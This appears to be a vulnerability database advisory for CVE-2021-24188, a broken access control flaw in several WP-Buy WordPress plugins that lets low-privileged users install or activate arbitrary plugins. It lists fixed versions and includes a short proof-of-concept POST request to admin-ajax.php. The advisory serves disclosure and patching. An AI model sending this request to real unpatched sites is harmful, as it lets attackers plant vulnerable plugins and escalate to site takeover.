Multiple WP-Buy Plugins – Arbitrary Plugin Installation/Activation via Low Privilege User | CVE 2021-24188 | Plugin Vulnerabilities

Description

Low privileged users could use the AJAX action "cp_plugins_do_button_job_later_callback" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.

Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog.

Proof of Concept

Vulnerable code : 
 cp_plugins_do_button_job_later_callback() method in settings-start-index.php file

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: [Low Privilege User cookie]
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

action=do_button_job_later&slug=plugin_slug.version


To activate installed plugins, use the same request, but with the plugin_file instead of slug parameter

Affects Plugins

wp-content-copy-protector

Fixed in 3.1.5

conditional-marketing-mailer

Fixed in 1.5.2

captchinoo-captcha-for-login-form-protection

Fixed in 2.4

wp-maintenance-mode-site-under-construction

Fixed in 1.8.2

tree-website-map

Fixed in 2.9

visitors-traffic-real-time-statistics

Fixed in 2.12

wp-limit-failed-login-attempts

Fixed in 2.9

login-as-customer-or-user

Fixed in 1.8

References

CVE

CVE

CVE

CVE

CVE

CVE

CVE

CVE

URL

https://plugins.trac.wordpress.org/changeset/2494586/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Bugbang

Submitter

Bugbang

Submitter twitter

Verified

Yes

WPVDB ID

74889e29-5349-43d1-baf5-1622493be90c

Timeline

Publicly Published

2021-04-22 (about 4 years ago)

Added

2021-04-22 (about 4 years ago)

Last Updated

2021-04-24 (about 4 years ago)

Other

Published

Title

Published

2025-08-28

Title

WP Hotel Booking < 2.2.3 - Subscriber+ Rating Manipulation

Published

2021-12-06

Title

Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls

Published

2020-11-28

Title

BuddyPress < 6.4.0 - Lack of Capability Check on Profile Page

Published

2021-05-07

Title

Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change

Published

2021-10-20

Title

Sassy Social Share 3.3.23 - Missing Access Controls to PHP Object Injection